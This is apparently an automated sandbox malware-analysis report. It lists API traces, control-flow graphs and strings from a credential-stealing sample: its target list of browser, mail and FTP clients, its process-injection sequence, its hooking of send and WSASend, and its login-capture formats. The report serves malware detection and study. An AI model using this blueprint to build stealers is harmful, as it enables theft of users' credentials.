                                                      • lstrcmpi.KERNEL32(?,chrome.exe), ref: 000C1142
                                                      • lstrcmpi.KERNEL32(?,opera.exe), ref: 000C1156
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C1166
                                                      • lstrcmpi.KERNEL32(?,outlook.exe), ref: 000C117A
                                                      • lstrcmpi.KERNEL32(?,thebat.exe), ref: 000C118E
                                                      • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000C11A2
                                                      • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000C11B6
                                                      • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000C11CA
                                                      • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000C11DE
                                                      • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000C11F2
                                                      • lstrcmpi.KERNEL32(?,winscp.exe), ref: 000C1206
                                                      • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 000C1216
                                                      • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 000C1226
                                                      • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 000C1236
                                                      • lstrcmpi.KERNEL32(?,263em.exe), ref: 000C1246
                                                      • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 000C1256
                                                      • lstrcmpi.KERNEL32(?,alimail.exe), ref: 000C1266
                                                      • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 000C1276
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C12B4
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 000C130B
                                                      • CloseHandle.KERNELBASE(00000000), ref: 000C131C
                                                      • Sleep.KERNELBASE(000003E8), ref: 000C1327
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                      • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                      • API String ID: 2555639992-1680033604
                                                      • Opcode ID: 622fcf9bd27b25c97b2a17fb2ef2162854cc26da12bc78b5be0b67476663e74b
                                                      • Instruction ID: 54b6bc8a74e964362036cf5b6869e04bda0f949686daf59f36d080a5539ac7a1
                                                      • Opcode Fuzzy Hash: 622fcf9bd27b25c97b2a17fb2ef2162854cc26da12bc78b5be0b67476663e74b
                                                      • Instruction Fuzzy Hash: E171A231614345ABEB50EBB09C55FEE7BECAF46780B08452DFA40C7092EB79DA058B74
                                                      Function 000C10A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203stringsleepprocessCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 65 c10a4-c10d7 call c2861 68 c10dc-c10ea CreateToolhelp32Snapshot 65->68 69 c10f0-c1106 Process32First 68->69 70 c1322-c132d Sleep 68->70 71 c110c-c111e lstrcmpi 69->71 72 c131b-c131c CloseHandle 69->72 70->68 73 c1124-c1132 lstrcmpi 71->73 74 c1280-c1289 call c25ad 71->74 72->70 73->74 75 c1138-c1146 lstrcmpi 73->75 80 c128b-c1294 call c2592 74->80 81 c1305-c1313 Process32Next 74->81 75->74 77 c114c-c115a lstrcmpi 75->77 77->74 79 c1160-c116a lstrcmpi 77->79 79->74 82 c1170-c117e lstrcmpi 79->82 80->81 88 c1296-c129d call c2573 80->88 81->71 83 c1319 81->83 82->74 85 c1184-c1192 lstrcmpi 82->85 83->72 85->74 87 c1198-c11a6 lstrcmpi 85->87 87->74 89 c11ac-c11ba lstrcmpi 87->89 88->81 94 c129f-c12ac call c2608 88->94 89->74 91 c11c0-c11ce lstrcmpi 89->91 91->74 93 c11d4-c11e2 lstrcmpi 91->93 93->74 95 c11e8-c11f6 lstrcmpi 93->95 94->81 99 c12ae-c1300 lstrcmpi call c2731 call c1819 call c2731 94->99 95->74 98 c11fc-c120a lstrcmpi 95->98 98->74 100 c120c-c121a lstrcmpi 98->100 99->81 100->74 102 c121c-c122a lstrcmpi 100->102 102->74 103 c122c-c123a lstrcmpi 102->103 103->74 105 c123c-c124a lstrcmpi 103->105 105->74 107 c124c-c125a lstrcmpi 105->107 107->74 109 c125c-c126a lstrcmpi 107->109 109->74 111 c126c-c127a lstrcmpi 109->111 111->74 111->81
                                                      APIs
                                                        • Part of subcall function 000C2861: GetProcessHeap.KERNEL32(00000008,0000A000,000C10CC), ref: 000C2864
                                                        • Part of subcall function 000C2861: RtlAllocateHeap.NTDLL(00000000), ref: 000C286B
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C10DF
                                                      • Process32First.KERNEL32(00000000,?), ref: 000C10FE
                                                      • lstrcmpi.KERNEL32(?,firefox.exe), ref: 000C111A
                                                      • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 000C112E
                                                      • lstrcmpi.KERNEL32(?,chrome.exe), ref: 000C1142
                                                      • lstrcmpi.KERNEL32(?,opera.exe), ref: 000C1156
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C1166
                                                      • lstrcmpi.KERNEL32(?,outlook.exe), ref: 000C117A
                                                      • lstrcmpi.KERNEL32(?,thebat.exe), ref: 000C118E
                                                      • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000C11A2
                                                      • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000C11B6
                                                      • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000C11CA
                                                      • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000C11DE
                                                      • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000C11F2
                                                      • lstrcmpi.KERNEL32(?,winscp.exe), ref: 000C1206
                                                      • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 000C1216
                                                      • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 000C1226
                                                      • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 000C1236
                                                      • lstrcmpi.KERNEL32(?,263em.exe), ref: 000C1246
                                                      • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 000C1256
                                                      • lstrcmpi.KERNEL32(?,alimail.exe), ref: 000C1266
                                                      • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 000C1276
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C12B4
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 000C130B
                                                      • CloseHandle.KERNELBASE(00000000), ref: 000C131C
                                                      • Sleep.KERNELBASE(000003E8), ref: 000C1327
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                      • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                      • API String ID: 3950187957-1680033604
                                                      • Opcode ID: 6fe84fb342beb606166c265e69935f49d22730f4db86aed32df6f4077efd07e7
                                                      • Instruction ID: 06162d223618393fa6c8fe91d79d6bdaf10c44f83c16165dd54d4970907d8ed5
                                                      • Opcode Fuzzy Hash: 6fe84fb342beb606166c265e69935f49d22730f4db86aed32df6f4077efd07e7
                                                      • Instruction Fuzzy Hash: F251A571614345A7EB40EBB18C85FAFBBEC6F46780B04492DFA80C70D2EF64DA058A75
                                                      Function 000C7728 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 112 c7728-c7745 113 c790d 112->113 114 c774b-c7758 112->114 113->113 115 c776a-c776f 114->115 116 c7771 115->116 117 c7760-c7765 116->117 118 c7773 116->118 120 c7766-c7768 117->120 119 c7778-c777a 118->119 121 c777c-c7781 119->121 122 c7783-c7787 119->122 120->115 120->116 121->122 122->119 123 c7789 122->123 124 c778b-c7792 123->124 125 c7794-c7799 123->125 124->119 124->125 126 c77a8-c77aa 125->126 127 c779b-c77a4 125->127 130 c77ac-c77b1 126->130 131 c77b3-c77b7 126->131 128 c781a-c781d 127->128 129 c77a6 127->129 132 c7822-c7825 128->132 129->126 130->131 133 c77b9-c77be 131->133 134 c77c0-c77c2 131->134 137 c7827-c7829 132->137 133->134 135 c77e4-c77f3 134->135 136 c77c4 134->136 139 c7804-c7811 135->139 140 c77f5-c77fc 135->140 138 c77c5-c77c7 136->138 137->132 141 c782b-c782e 137->141 143 c77c9-c77ce 138->143 144 c77d0-c77d4 138->144 139->139 146 c7813-c7815 139->146 140->140 145 c77fe 140->145 141->132 142 c7830-c784c 141->142 142->137 147 c784e 142->147 143->144 144->138 148 c77d6 144->148 145->120 146->120 149 c7854-c7858 147->149 150 c77d8-c77df 148->150 151 c77e1 148->151 152 c789f-c78a2 149->152 153 c785a-c7870 LoadLibraryA 149->153 150->138 150->151 151->135 155 c78a5-c78ac 152->155 154 c7871-c7876 153->154 154->149 156 c7878-c787a 154->156 157 c78ae-c78b0 155->157 158 c78d0-c7900 VirtualProtect * 2 155->158 160 c787c-c7882 156->160 161 c7883-c7890 GetProcAddress 156->161 162 c78b2-c78c1 157->162 163 c78c3-c78ce 157->163 159 c7904-c7908 158->159 159->159 164 c790a 159->164 160->161 165 c7899-c789c 161->165 166 c7892-c7897 161->166 162->155 163->162 164->113 166->154
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C6000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c6000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3b459fe83487325506da812504ff279d912cf47021c592ab2696e7eecfa011e7
                                                      • Instruction ID: eb3607feab7254c5dcdbfa78ba087b045d5656e9aa6ae36a1ecaffe79259ccf0
                                                      • Opcode Fuzzy Hash: 3b459fe83487325506da812504ff279d912cf47021c592ab2696e7eecfa011e7
                                                      • Instruction Fuzzy Hash: 7051E87194C3564FD7224B78CC84BAD7BE0EB52320B29077DD5E9CB3C6EA94580ACB61
                                                      Function 000C2861 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 167 c2861-c2871 GetProcessHeap RtlAllocateHeap
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000A000,000C10CC), ref: 000C2864
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 000C286B
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: efe074880906266fbc637112cab0f49a542b48b7148310e68f052a2ed5cadc65
                                                      • Instruction ID: fabd7088274ea5878392692656984166807aa6bd3bc966c638ce349ac8c678d8
                                                      • Opcode Fuzzy Hash: efe074880906266fbc637112cab0f49a542b48b7148310e68f052a2ed5cadc65
                                                      • Instruction Fuzzy Hash: 90A012724202007FFD4017A0AC1DF053A18B740301F1080007109C40608968014C8721

                                                      Non-executed Functions

                                                      Function 000C1819 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208injectionnativesleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000C2608: VirtualQuery.KERNEL32(000C4434,?,0000001C), ref: 000C2615
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,756F3E2E,microsoftedgecp.exe,?), ref: 000C184E
                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 000C1889
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000C1919
                                                      • RtlMoveMemory.NTDLL(00000000,000C3428,00000016), ref: 000C1940
                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 000C1968
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 000C1978
                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C1992
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 000C199A
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C19A8
                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C19AF
                                                      • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000C19C5
                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C19CC
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C19E2
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C1A0C
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1A1F
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C1A26
                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C1A2D
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C1A41
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000C1A58
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C1A65
                                                      • CloseHandle.KERNEL32(?), ref: 000C1A6B
                                                      • CloseHandle.KERNEL32(?), ref: 000C1A71
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C1A74
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                      • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                      • API String ID: 1066286714-4141090125
                                                      • Opcode ID: a6ba1d4609ff3c06d8a804dcc6138e8a7f65a91240fa9a5254e3153841d0bee1
                                                      • Instruction ID: cd3e5879ca9d27351b964acb90a976cadfa7936318c72bb99405be818c26c2d8
                                                      • Opcode Fuzzy Hash: a6ba1d4609ff3c06d8a804dcc6138e8a7f65a91240fa9a5254e3153841d0bee1
                                                      • Instruction Fuzzy Hash: 15618B31205304AFE310DF659C84EAFBBECEF8A754F04461DF949D2292DA74DE048BA2
                                                      Function 000C263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000C265A
                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000C2672
                                                      • lstrlen.KERNEL32(?,00000000), ref: 000C267A
                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000C2685
                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000C269F
                                                      • wsprintfA.USER32 ref: 000C26B6
                                                      • CryptDestroyHash.ADVAPI32(?), ref: 000C26CF
                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 000C26D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                      • String ID: %02X
                                                      • API String ID: 3341110664-436463671
                                                      • Opcode ID: 31bcc4255bfd709aa7cfa5d8d414a08930f501f089af272d391fcf7c25d48962
                                                      • Instruction ID: 1ced2dabd5bde09d24f47223e58c929b0f130381b90d8f82d5c22ed8a991796b
                                                      • Opcode Fuzzy Hash: 31bcc4255bfd709aa7cfa5d8d414a08930f501f089af272d391fcf7c25d48962
                                                      • Instruction Fuzzy Hash: 1E110D72900108BFEB119B95EC88FEEBFBCEB44741F208065F605E2150D7754F559B60
                                                      Function 000C1332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94libraryloadersleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000C2861: GetProcessHeap.KERNEL32(00000008,0000A000,000C10CC), ref: 000C2864
                                                        • Part of subcall function 000C2861: RtlAllocateHeap.NTDLL(00000000), ref: 000C286B
                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,000C109E,?,000C1010), ref: 000C134A
                                                      • GetCurrentProcessId.KERNEL32(00000003,?,000C109E,?,000C1010), ref: 000C135B
                                                      • wsprintfA.USER32 ref: 000C1372
                                                        • Part of subcall function 000C263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000C265A
                                                        • Part of subcall function 000C263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000C2672
                                                        • Part of subcall function 000C263E: lstrlen.KERNEL32(?,00000000), ref: 000C267A
                                                        • Part of subcall function 000C263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000C2685
                                                        • Part of subcall function 000C263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000C269F
                                                        • Part of subcall function 000C263E: wsprintfA.USER32 ref: 000C26B6
                                                        • Part of subcall function 000C263E: CryptDestroyHash.ADVAPI32(?), ref: 000C26CF
                                                        • Part of subcall function 000C263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 000C26D9
                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000C1389
                                                      • GetLastError.KERNEL32 ref: 000C138F
                                                      • Sleep.KERNEL32(000001F4), ref: 000C13A1
                                                        • Part of subcall function 000C24D5: GetCurrentProcessId.KERNEL32 ref: 000C24E7
                                                        • Part of subcall function 000C24D5: GetCurrentThreadId.KERNEL32 ref: 000C24EF
                                                        • Part of subcall function 000C24D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000C24FF
                                                        • Part of subcall function 000C24D5: Thread32First.KERNEL32(00000000,0000001C), ref: 000C250D
                                                        • Part of subcall function 000C24D5: CloseHandle.KERNEL32(00000000), ref: 000C2566
                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 000C13B8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000C13BF
                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 000C13E4
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000C13EB
                                                        • Part of subcall function 000C1DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 000C1E1D
                                                      • RtlExitUserThread.NTDLL(00000000), ref: 000C141D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                      • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                      • API String ID: 706757162-1430290102
                                                      • Opcode ID: ed703c6ed2116747e614e201ea63f73ff4792a1420a91167ce5346e59d09c908
                                                      • Instruction ID: 4b5f7ea1cadc2ac20a0ec92a998f2ea489c7677d7cb7c13025d44b97cc9c8dd5
                                                      • Opcode Fuzzy Hash: ed703c6ed2116747e614e201ea63f73ff4792a1420a91167ce5346e59d09c908
                                                      • Instruction Fuzzy Hash: 43316631350214BBDF147FA1EC1AFDE3A65AF06741F14801CFB069A693CF799A518791
                                                      Function 000C1647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91stringnetworkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 235 c1647-c165a 236 c1748-c174f 235->236 237 c1660-c1662 235->237 237->236 238 c1668-c166b 237->238 238->236 239 c1671-c167d lstrlen 238->239 240 c1747 239->240 241 c1683-c168a lstrlen 239->241 240->236 241->240 242 c1690-c16a8 getpeername 241->242 242->240 243 c16ae-c16ca inet_ntoa htons 242->243 243->240 244 c16cc-c16d4 243->244 245 c1708 244->245 246 c16d6-c16d9 244->246 247 c170d-c173c call c2861 wsprintfA call c24ae 245->247 248 c16db-c16de 246->248 249 c16f3-c16f8 246->249 247->240 259 c173e-c1745 call c2843 247->259 251 c16e0-c16e3 248->251 252 c1701-c1706 248->252 249->247 254 c16fa-c16ff 251->254 255 c16e5-c16ea 251->255 252->247 254->247 255->249 257 c16ec-c16f1 255->257 257->240 257->249 259->240
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                      • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                      • API String ID: 3379139566-1703351401
                                                      • Opcode ID: f403b1286cee76ee6f6dae1f1999a7e2d6d1d0c5b0d0c6e88400c0b1beaf664c
                                                      • Instruction ID: 499965f4e4083e958a8f6306685f921984b4bef0f59b6f31784507629b2398a1
                                                      • Opcode Fuzzy Hash: f403b1286cee76ee6f6dae1f1999a7e2d6d1d0c5b0d0c6e88400c0b1beaf664c
                                                      • Instruction Fuzzy Hash: B721B532E04209AB9F505FADCD88FFE7AF99B46301B08827DE904D3212DA38CE119E50
                                                      Function 000C1752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 267 c1752-c1774 GetModuleHandleA GetProcAddress 268 c1776-c17c0 RtlZeroMemory * 4 267->268 269 c17c1-c17c6 267->269 268->269
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,000C1539,?,?,?,000C144B,?), ref: 000C1763
                                                      • GetProcAddress.KERNEL32(00000000,?,000C1539,?,?,?,000C144B,?), ref: 000C176A
                                                      • RtlZeroMemory.NTDLL(000C4228,00000104), ref: 000C1788
                                                      • RtlZeroMemory.NTDLL(000C4118,00000104), ref: 000C1790
                                                      • RtlZeroMemory.NTDLL(000C4330,00000104), ref: 000C1798
                                                      • RtlZeroMemory.NTDLL(000C4000,00000104), ref: 000C17A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MemoryZero$AddressHandleModuleProc
                                                      • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                      • API String ID: 1490332519-278825019
                                                      • Opcode ID: 665bc838b465a568221843140d7207551f5ca96e76c2cf7f93d5faa304cd1841
                                                      • Instruction ID: 9b72f5d197ddab54b541b5cd6753ea4d33bdff7fe5bcb16f7c936cbc105116f1
                                                      • Opcode Fuzzy Hash: 665bc838b465a568221843140d7207551f5ca96e76c2cf7f93d5faa304cd1841
                                                      • Instruction Fuzzy Hash: 94F0893279032C33852023AA7C26F4FBD5CE791FA6356415DBB046B191C899690045F5
                                                      Function 000C24D5 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 271 c24d5-c2513 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 272 c2561-c2563 271->272 273 c2515-c2519 272->273 274 c2565-c2572 CloseHandle 272->274 275 c251b-c251f 273->275 276 c2555-c255b Thread32Next 273->276 275->276 277 c2521-c253a OpenThread 275->277 276->272 278 c253c-c2542 SuspendThread 277->278 279 c2544 ResumeThread 277->279 280 c254a-c2551 CloseHandle 278->280 279->280 280->276
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 000C24E7
                                                      • GetCurrentThreadId.KERNEL32 ref: 000C24EF
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000C24FF
                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 000C250D
                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 000C252C
                                                      • SuspendThread.KERNEL32(00000000), ref: 000C253C
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C254B
                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 000C255B
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C2566
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                      • String ID:
                                                      • API String ID: 1467098526-0
                                                      • Opcode ID: 477cca89c268fa9f198ed8d2171336c16bc28f30b2bb338eca8c59edb517dc68
                                                      • Instruction ID: a47115e1c75b1418c54b03f969bdd4ab596ab9b2ce003d6c307f16a25842e24d
                                                      • Opcode Fuzzy Hash: 477cca89c268fa9f198ed8d2171336c16bc28f30b2bb338eca8c59edb517dc68
                                                      • Instruction Fuzzy Hash: 6D113C72414701EBE711AF60AC6CF6FBBA8FB85701F14852DFA4192150D7389A498BA3
                                                      Function 000C1F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 281 c1f4a-c1fa5 call c22b8 call c2861 call c27e2 call c2374 290 c1fa7-c1fbe 281->290 291 c1fc0-c1fcc 281->291 294 c1fd0-c1fd2 290->294 291->294 295 c1fd8-c200f RtlZeroMemory 294->295 296 c22a6-c22b5 call c2843 294->296 300 c229e-c22a5 295->300 301 c2015-c2030 295->301 300->296 302 c2062-c2074 301->302 303 c2032-c2043 call c22e5 301->303 308 c2078-c207a 302->308 309 c2045-c2054 303->309 310 c2056 303->310 312 c228b-c2291 308->312 313 c2080-c20dc call c2731 308->313 311 c2058-c2060 309->311 310->311 311->308 314 c229a 312->314 315 c2293-c2295 call c2843 312->315 321 c2284 313->321 322 c20e2-c20e7 313->322 314->300 315->314 321->312 323 c20e9-c20fa 322->323 324 c2101-c212f call c2861 wsprintfW 322->324 323->324 327 c2148-c215f 324->327 328 c2131-c2133 324->328 334 c219e-c21b8 327->334 335 c2161-c2197 call c2861 wsprintfW 327->335 329 c2134-c2137 328->329 330 c2139-c213e 329->330 331 c2142-c2144 329->331 330->329 333 c2140 330->333 331->327 333->327 339 c21be-c21d1 334->339 340 c2261-c2277 call c2843 334->340 335->334 339->340 343 c21d7-c21ed call c2861 339->343 348 c2279-c227b call c2843 340->348 349 c2280 340->349 350 c21ef-c21fa 343->350 348->349 349->321 352 c21fc-c2209 call c2826 350->352 353 c220e-c2225 350->353 352->353 357 c2229-c2236 353->357 358 c2227 353->358 357->350 359 c2238-c223c 357->359 358->357 360 c223e 359->360 361 c2256-c225d call c2843 359->361 362 